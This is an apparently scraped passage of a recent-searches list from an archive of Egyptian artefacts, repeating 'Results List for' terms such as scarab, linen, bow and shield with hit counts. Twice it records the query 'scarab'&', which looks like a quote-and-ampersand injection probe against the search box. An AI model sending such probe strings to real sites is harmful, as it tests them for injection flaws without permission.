linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for glass - (hits/occ.: 28)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for anubis - (hits/occ.: 5)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for throne - (hits/occ.: 3)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for shield - (hits/occ.: 8)Results List for glove - (hits/occ.: 10)Results List for basket - (hits/occ.: 128)Results List for garland - (hits/occ.: 2)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for wreath - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bouquet - (hits/occ.: 6)Results List for glass - (hits/occ.: 28)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for seal - (hits/occ.: 16)Results List for scarab - (hits/occ.: 15)Results List for loin - (hits/occ.: 25)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for sandal - (hits/occ.: 25)Results List for bouquet - (hits/occ.: 6)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for scarab'& - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bouquet - (hits/occ.: 6)Results List for scarab'& - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 14)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for mask - (hits/occ.: 1)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for sandal - (hits/occ.: 25)Results List for scarab - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for scarab - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for throne - (hits/occ.: 3)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for 1 - (hits/occ.: 145)Results List for anubis - (hits/occ.: 5)Results List for shield - (hits/occ.: 8)Results List for anubis - (hits/occ.: 5)Results List for shield - (hits/occ.: 8)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for 1 - (hits/occ.: 145)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for anubis - (hits/occ.: 5)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for loin - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for wreath - (hits/occ.: 1)Results List for garland - (hits/occ.: 2)Results List for bouquet - (hits/occ.: 6)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for gauntlet - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for chariot - (hits/occ.: 135)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for bouquet - (hits/occ.: 6)Results List for wreath - (hits/occ.: 1)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 14)Results List for linen - 